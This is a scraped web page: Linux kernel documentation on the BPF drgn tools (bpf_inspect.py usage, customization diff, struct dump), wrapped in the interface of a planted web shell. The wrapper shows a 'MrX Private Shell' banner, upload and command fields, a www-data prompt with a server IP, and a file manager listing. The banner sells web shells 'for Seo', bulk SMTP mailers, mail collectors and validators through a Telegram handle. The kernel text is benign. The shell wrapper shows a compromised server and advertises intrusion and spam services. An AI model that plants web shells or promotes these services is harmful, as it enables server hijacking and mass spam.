__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.244: ~ $
<!DOCTYPE html>

<html lang="en" data-content_root="../">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />

    <title>BPF drgn tools &#8212; The Linux Kernel  documentation</title>
    <link rel="stylesheet" type="text/css" href="../_static/pygments.css?v=fa44fd50" />
    <link rel="stylesheet" type="text/css" href="../_static/alabaster.css?v=3918102e" />
    <script src="../_static/documentation_options.js?v=5929fcd5"></script>
    <script src="../_static/doctools.js?v=9bcbadda"></script>
    <script src="../_static/sphinx_highlight.js?v=dc90522c"></script>
    <link rel="index" title="Index" href="../genindex.html" />
    <link rel="search" title="Search" href="../search.html" />
    <link rel="next" title="Testing BPF on s390" href="s390.html" />
    <link rel="prev" title="Testing and debugging BPF" href="test_debug.html" />
   
  <link rel="stylesheet" href="../_static/custom.css" type="text/css" />
  

  
  

  </head><body>
  <div class="document">
    
      <div class="sphinxsidebar" role="navigation" aria-label="Main">
        <div class="sphinxsidebarwrapper">
            <p class="logo"><a href="../index.html">
              <img class="logo" src="../_static/logo.svg" alt="Logo of The Linux Kernel"/>
            </a></p>
<h1 class="logo"><a href="../index.html">The Linux Kernel</a></h1>



<p class="blurb">6.18.50</p>







<search id="searchbox" style="display: none" role="search">
  <h3 id="searchlabel">Quick search</h3>
    <div class="searchformwrapper">
    <form class="search" action="../search.html" method="get">
      <input type="text" name="q" aria-labelledby="searchlabel" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/>
      <input type="submit" value="Go" />
    </form>
    </div>
</search>
<script>document.getElementById('searchbox').style.display = "block"</script>


<p>
<h3 class="kernel-toc-contents">Contents</h3>
<input type="checkbox" class="kernel-toc-toggle" id = "kernel-toc-toggle" checked>
<label class="kernel-toc-title" for="kernel-toc-toggle"></label>

<div class="kerneltoc" id="kerneltoc">
<ul>
<li class="toctree-l1"><a class="reference internal" href="../process/development-process.html">Development process</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/submitting-patches.html">Submitting patches</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/code-of-conduct.html">Code of conduct</a></li>
<li class="toctree-l1"><a class="reference internal" href="../maintainer/index.html">Maintainer handbook</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/index.html">All development-process docs</a></li>
</ul>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="../core-api/index.html">Core API</a></li>
<li class="toctree-l1"><a class="reference internal" href="../driver-api/index.html">Driver APIs</a></li>
<li class="toctree-l1 current"><a class="reference internal" href="../subsystem-apis.html">Subsystems</a><ul class="current">
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#core-subsystems">Core subsystems</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#human-interfaces">Human interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#networking-interfaces">Networking interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#storage-interfaces">Storage interfaces</a></li>
<li class="toctree-l2 current"><a class="reference internal" href="../subsystem-apis.html#other-subsystems">Other subsystems</a><ul class="current">
<li class="toctree-l3"><a class="reference internal" href="../accounting/index.html">Accounting</a></li>
<li class="toctree-l3"><a class="reference internal" href="../cpu-freq/index.html">CPUFreq - CPU frequency and voltage scaling code in the Linux(TM) kernel</a></li>
<li class="toctree-l3"><a class="reference internal" href="../edac/index.html">EDAC Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../fpga/index.html">FPGA</a></li>
<li class="toctree-l3"><a class="reference internal" href="../i2c/index.html">I2C/SMBus Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../iio/index.html">Industrial I/O</a></li>
<li class="toctree-l3"><a class="reference internal" href="../pcmcia/index.html">PCMCIA</a></li>
<li class="toctree-l3"><a class="reference internal" href="../spi/index.html">Serial Peripheral Interface (SPI)</a></li>
<li class="toctree-l3"><a class="reference internal" href="../w1/index.html">1-Wire Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../watchdog/index.html">Watchdog Support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../virt/index.html">Virtualization Support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../hwmon/index.html">Hardware Monitoring</a></li>
<li class="toctree-l3"><a class="reference internal" href="../accel/index.html">Compute Accelerators</a></li>
<li class="toctree-l3"><a class="reference internal" href="../security/index.html">Security Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../crypto/index.html">Crypto API</a></li>
<li class="toctree-l3 current"><a class="reference internal" href="index.html">BPF Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../usb/index.html">USB support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../PCI/index.html">PCI Bus Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../misc-devices/index.html">Assorted Miscellaneous Devices Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../peci/index.html">PECI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../wmi/index.html">WMI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../tee/index.html">TEE Subsystem</a></li>
</ul>
</li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="../locking/index.html">Locking</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../process/license-rules.html">Licensing rules</a></li>
<li class="toctree-l1"><a class="reference internal" href="../doc-guide/index.html">Writing documentation</a></li>
<li class="toctree-l1"><a class="reference internal" href="../dev-tools/index.html">Development tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../dev-tools/testing-overview.html">Testing guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../kernel-hacking/index.html">Hacking guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../trace/index.html">Tracing</a></li>
<li class="toctree-l1"><a class="reference internal" href="../fault-injection/index.html">Fault injection</a></li>
<li class="toctree-l1"><a class="reference internal" href="../livepatch/index.html">Livepatching</a></li>
<li class="toctree-l1"><a class="reference internal" href="../rust/index.html">Rust</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../admin-guide/index.html">Administration</a></li>
<li class="toctree-l1"><a class="reference internal" href="../kbuild/index.html">Build system</a></li>
<li class="toctree-l1"><a class="reference internal" href="../admin-guide/reporting-issues.html">Reporting issues</a></li>
<li class="toctree-l1"><a class="reference internal" href="../tools/index.html">Userspace tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../userspace-api/index.html">Userspace API</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../firmware-guide/index.html">Firmware</a></li>
<li class="toctree-l1"><a class="reference internal" href="../devicetree/index.html">Firmware and Devicetree</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../arch/index.html">CPU architectures</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../staging/index.html">Unsorted documentation</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../translations/index.html">Translations</a></li>
</ul>

</div>

<script type="text/javascript"> <!--
  var sbar = document.getElementsByClassName("sphinxsidebar")[0];
  let currents = document.getElementsByClassName("current")
  if (currents.length) {
    sbar.scrollTop = currents[currents.length - 1].offsetTop;
  }
  --> </script>
  <div role="note" aria-label="source link">
    <h3>This Page</h3>
    <ul class="this-page-menu">
      <li><a href="../_sources/bpf/drgn.rst.txt"
            rel="nofollow">Show Source</a></li>
    </ul>
   </div>
        </div>
      </div>
      <div class="documentwrapper">
        <div class="bodywrapper">
          

          <div class="body" role="main">
            
  



<section id="bpf-drgn-tools">
<h1>BPF drgn tools<a class="headerlink" href="#bpf-drgn-tools" title="Link to this heading">¶</a></h1>
<p>drgn scripts is a convenient and easy to use mechanism to retrieve arbitrary
kernel data structures. drgn is not relying on kernel UAPI to read the data.
Instead it’s reading directly from <code class="docutils literal notranslate"><span class="pre">/proc/kcore</span></code> or vmcore and pretty prints
the data based on DWARF debug information from vmlinux.</p>
<p>This document describes BPF related drgn tools.</p>
<p>See <a class="reference external" href="https://github.com/osandov/drgn/tree/master/tools">drgn/tools</a> for all tools available at the moment and <a class="reference external" href="https://drgn.readthedocs.io/en/latest/">drgn/doc</a> for
more details on drgn itself.</p>
<section id="bpf-inspect-py">
<h2>bpf_inspect.py<a class="headerlink" href="#bpf-inspect-py" title="Link to this heading">¶</a></h2>
<section id="description">
<h3>Description<a class="headerlink" href="#description" title="Link to this heading">¶</a></h3>
<p><a class="reference external" href="https://github.com/osandov/drgn/blob/master/tools/bpf_inspect.py">bpf_inspect.py</a> is a tool intended to inspect BPF programs and maps. It can
iterate over all programs and maps in the system and print basic information
about these objects, including id, type and name.</p>
<p>The main use-case <a class="reference external" href="https://github.com/osandov/drgn/blob/master/tools/bpf_inspect.py">bpf_inspect.py</a> covers is to show BPF programs of types
<code class="docutils literal notranslate"><span class="pre">BPF_PROG_TYPE_EXT</span></code> and <code class="docutils literal notranslate"><span class="pre">BPF_PROG_TYPE_TRACING</span></code> attached to other BPF
programs via <code class="docutils literal notranslate"><span class="pre">freplace</span></code>/<code class="docutils literal notranslate"><span class="pre">fentry</span></code>/<code class="docutils literal notranslate"><span class="pre">fexit</span></code> mechanisms, since there is no
user-space API to get this information.</p>
</section>
<section id="getting-started">
<h3>Getting started<a class="headerlink" href="#getting-started" title="Link to this heading">¶</a></h3>
<p>List BPF programs (full names are obtained from BTF):</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>% sudo bpf_inspect.py prog
    27: BPF_PROG_TYPE_TRACEPOINT         tracepoint__tcp__tcp_send_reset
  4632: BPF_PROG_TYPE_CGROUP_SOCK_ADDR   tw_ipt_bind
 49464: BPF_PROG_TYPE_RAW_TRACEPOINT     raw_tracepoint__sched_process_exit
</pre></div>
</div>
<p>List BPF maps:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>% sudo bpf_inspect.py map
  2577: BPF_MAP_TYPE_HASH                tw_ipt_vips
  4050: BPF_MAP_TYPE_STACK_TRACE         stack_traces
  4069: BPF_MAP_TYPE_PERCPU_ARRAY        ned_dctcp_cntr
</pre></div>
</div>
<p>Find BPF programs attached to BPF program <code class="docutils literal notranslate"><span class="pre">test_pkt_access</span></code>:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>% sudo bpf_inspect.py p | grep test_pkt_access
   650: BPF_PROG_TYPE_SCHED_CLS          test_pkt_access
   654: BPF_PROG_TYPE_TRACING            test_main                        linked:[650-&gt;25: BPF_TRAMP_FEXIT test_pkt_access-&gt;test_pkt_access()]
   655: BPF_PROG_TYPE_TRACING            test_subprog1                    linked:[650-&gt;29: BPF_TRAMP_FEXIT test_pkt_access-&gt;test_pkt_access_subprog1()]
   656: BPF_PROG_TYPE_TRACING            test_subprog2                    linked:[650-&gt;31: BPF_TRAMP_FEXIT test_pkt_access-&gt;test_pkt_access_subprog2()]
   657: BPF_PROG_TYPE_TRACING            test_subprog3                    linked:[650-&gt;21: BPF_TRAMP_FEXIT test_pkt_access-&gt;test_pkt_access_subprog3()]
   658: BPF_PROG_TYPE_EXT                new_get_skb_len                  linked:[650-&gt;16: BPF_TRAMP_REPLACE test_pkt_access-&gt;get_skb_len()]
   659: BPF_PROG_TYPE_EXT                new_get_skb_ifindex              linked:[650-&gt;23: BPF_TRAMP_REPLACE test_pkt_access-&gt;get_skb_ifindex()]
   660: BPF_PROG_TYPE_EXT                new_get_constant                 linked:[650-&gt;19: BPF_TRAMP_REPLACE test_pkt_access-&gt;get_constant()]
</pre></div>
</div>
<p>It can be seen that there is a program <code class="docutils literal notranslate"><span class="pre">test_pkt_access</span></code>, id 650 and there
are multiple other tracing and ext programs attached to functions in
<code class="docutils literal notranslate"><span class="pre">test_pkt_access</span></code>.</p>
<p>For example the line:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>658: BPF_PROG_TYPE_EXT                new_get_skb_len                  linked:[650-&gt;16: BPF_TRAMP_REPLACE test_pkt_access-&gt;get_skb_len()]
</pre></div>
</div>
<p>, means that BPF program id 658, type <code class="docutils literal notranslate"><span class="pre">BPF_PROG_TYPE_EXT</span></code>, name
<code class="docutils literal notranslate"><span class="pre">new_get_skb_len</span></code> replaces (<code class="docutils literal notranslate"><span class="pre">BPF_TRAMP_REPLACE</span></code>) function <code class="docutils literal notranslate"><span class="pre">get_skb_len()</span></code>
that has BTF id 16 in BPF program id 650, name <code class="docutils literal notranslate"><span class="pre">test_pkt_access</span></code>.</p>
<p>Getting help:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>% sudo bpf_inspect.py
usage: bpf_inspect.py [-h] {prog,p,map,m} ...

drgn script to list BPF programs or maps and their properties
unavailable via kernel API.

See https://github.com/osandov/drgn/ for more details on drgn.

optional arguments:
  -h, --help      show this help message and exit

subcommands:
  {prog,p,map,m}
    prog (p)      list BPF programs
    map (m)       list BPF maps
</pre></div>
</div>
</section>
<section id="customization">
<h3>Customization<a class="headerlink" href="#customization" title="Link to this heading">¶</a></h3>
<p>The script is intended to be customized by developers to print relevant
information about BPF programs, maps and other objects.</p>
<p>For example, to print <code class="docutils literal notranslate"><span class="pre">struct</span> <span class="pre">bpf_prog_aux</span></code> for BPF program id 53077:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>% git diff
diff --git a/tools/bpf_inspect.py b/tools/bpf_inspect.py
index 650e228..aea2357 100755
--- a/tools/bpf_inspect.py
+++ b/tools/bpf_inspect.py
@@ -112,7 +112,9 @@ def list_bpf_progs(args):
         if linked:
             linked = f&quot; linked:[{linked}]&quot;

-        print(f&quot;{id_:&gt;6}: {type_:32} {name:32} {linked}&quot;)
+        if id_ == 53077:
+            print(f&quot;{id_:&gt;6}: {type_:32} {name:32}&quot;)
+            print(f&quot;{bpf_prog.aux}&quot;)


 def list_bpf_maps(args):
</pre></div>
</div>
<p>It produces the output:</p>
<div class="highlight-none notranslate"><div class="highlight"><pre><span></span>% sudo bpf_inspect.py p
 53077: BPF_PROG_TYPE_XDP                tw_xdp_policer
*(struct bpf_prog_aux *)0xffff8893fad4b400 = {
        .refcnt = (atomic64_t){
                .counter = (long)58,
        },
        .used_map_cnt = (u32)1,
        .max_ctx_offset = (u32)8,
        .max_pkt_offset = (u32)15,
        .max_tp_access = (u32)0,
        .stack_depth = (u32)8,
        .id = (u32)53077,
        .func_cnt = (u32)0,
        .func_idx = (u32)0,
        .attach_btf_id = (u32)0,
        .linked_prog = (struct bpf_prog *)0x0,
        .verifier_zext = (bool)0,
        .offload_requested = (bool)0,
        .attach_btf_trace = (bool)0,
        .func_proto_unreliable = (bool)0,
        .trampoline_prog_type = (enum bpf_tramp_prog_type)BPF_TRAMP_FENTRY,
        .trampoline = (struct bpf_trampoline *)0x0,
        .tramp_hlist = (struct hlist_node){
                .next = (struct hlist_node *)0x0,
                .pprev = (struct hlist_node **)0x0,
        },
        .attach_func_proto = (const struct btf_type *)0x0,
        .attach_func_name = (const char *)0x0,
        .func = (struct bpf_prog **)0x0,
        .jit_data = (void *)0x0,
        .poke_tab = (struct bpf_jit_poke_descriptor *)0x0,
        .size_poke_tab = (u32)0,
        .ksym_tnode = (struct latch_tree_node){
                .node = (struct rb_node [2]){
                        {
                                .__rb_parent_color = (unsigned long)18446612956263126665,
                                .rb_right = (struct rb_node *)0x0,
                                .rb_left = (struct rb_node *)0xffff88a0be3d0088,
                        },
                        {
                                .__rb_parent_color = (unsigned long)18446612956263126689,
                                .rb_right = (struct rb_node *)0x0,
                                .rb_left = (struct rb_node *)0xffff88a0be3d00a0,
                        },
                },
        },
        .ksym_lnode = (struct list_head){
                .next = (struct list_head *)0xffff88bf481830b8,
                .prev = (struct list_head *)0xffff888309f536b8,
        },
        .ops = (const struct bpf_prog_ops *)xdp_prog_ops+0x0 = 0xffffffff820fa350,
        .used_maps = (struct bpf_map **)0xffff889ff795de98,
        .prog = (struct bpf_prog *)0xffffc9000cf2d000,
        .user = (struct user_struct *)root_user+0x0 = 0xffffffff82444820,
        .load_time = (u64)2408348759285319,
        .cgroup_storage = (struct bpf_map *[2]){},
        .name = (char [16])&quot;tw_xdp_policer&quot;,
        .security = (void *)0xffff889ff795d548,
        .offload = (struct bpf_prog_offload *)0x0,
        .btf = (struct btf *)0xffff8890ce6d0580,
        .func_info = (struct bpf_func_info *)0xffff889ff795d240,
        .func_info_aux = (struct bpf_func_info_aux *)0xffff889ff795de20,
        .linfo = (struct bpf_line_info *)0xffff888a707afc00,
        .jited_linfo = (void **)0xffff8893fad48600,
        .func_info_cnt = (u32)1,
        .nr_linfo = (u32)37,
        .linfo_idx = (u32)0,
        .num_exentries = (u32)0,
        .extable = (struct exception_table_entry *)0xffffffffa032d950,
        .stats = (struct bpf_prog_stats *)0x603fe3a1f6d0,
        .work = (struct work_struct){
                .data = (atomic_long_t){
                        .counter = (long)0,
                },
                .entry = (struct list_head){
                        .next = (struct list_head *)0x0,
                        .prev = (struct list_head *)0x0,
                },
                .func = (work_func_t)0x0,
        },
        .rcu = (struct callback_head){
                .next = (struct callback_head *)0x0,
                .func = (void (*)(struct callback_head *))0x0,
        },
}
</pre></div>
</div>
</section>
</section>
</section>


          </div>
          
        </div>
      </div>
    <div class="clearer"></div>
  </div>
    <div class="footer">
      &#169;The kernel development community.
      
      |
      Powered by <a href="https://www.sphinx-doc.org/">Sphinx 8.1.3</a>
      &amp; <a href="https://alabaster.readthedocs.io">Alabaster 0.7.16</a>
      
      |
      <a href="../_sources/bpf/drgn.rst.txt"
          rel="nofollow">Page source</a>
    </div>

    

    
  </body>
</html>

Filemanager

Name Type Size Permission Actions
libbpf Folder 0755
standardization Folder 0755
bpf_design_QA.html File 39.76 KB 0644
bpf_devel_QA.html File 61.1 KB 0644
bpf_iterators.html File 43.95 KB 0644
bpf_licensing.html File 14.62 KB 0644
bpf_prog_run.html File 19 KB 0644
btf.html File 89.32 KB 0644
clang-notes.html File 13.55 KB 0644
classic_vs_extended.html File 26.83 KB 0644
cpumasks.html File 97.17 KB 0644
drgn.html File 20.27 KB 0644
faq.html File 10.01 KB 0644
fs_kfuncs.html File 10.67 KB 0644
graph_ds_impl.html File 30.56 KB 0644
helpers.html File 9.82 KB 0644
index.html File 12.27 KB 0644
kfuncs.html File 67.22 KB 0644
linux-notes.html File 16.73 KB 0644
llvm_reloc.html File 77.97 KB 0644
map_array.html File 37.73 KB 0644
map_bloom_filter.html File 26.42 KB 0644
map_cgroup_storage.html File 18.5 KB 0644
map_cgrp_storage.html File 16.3 KB 0644
map_cpumap.html File 29.43 KB 0644
map_devmap.html File 35.99 KB 0644
map_hash.html File 35.25 KB 0644
map_lpm_trie.html File 28.12 KB 0644
map_of_maps.html File 23.2 KB 0644
map_queue_stack.html File 23.69 KB 0644
map_sk_storage.html File 26.15 KB 0644
map_sockmap.html File 64.85 KB 0644
map_xskmap.html File 26.94 KB 0644
maps.html File 19.06 KB 0644
other.html File 10.06 KB 0644
prog_cgroup_sockopt.html File 27.23 KB 0644
prog_cgroup_sysctl.html File 18.75 KB 0644
prog_flow_dissector.html File 20.62 KB 0644
prog_lsm.html File 22.69 KB 0644
prog_sk_lookup.html File 16.62 KB 0644
programs.html File 10.56 KB 0644
redirect.html File 15.24 KB 0644
ringbuf.html File 24.44 KB 0644
s390.html File 17.98 KB 0644
syscall_api.html File 10.03 KB 0644
test_debug.html File 9.89 KB 0644
verifier.html File 37.16 KB 0644
Filemanager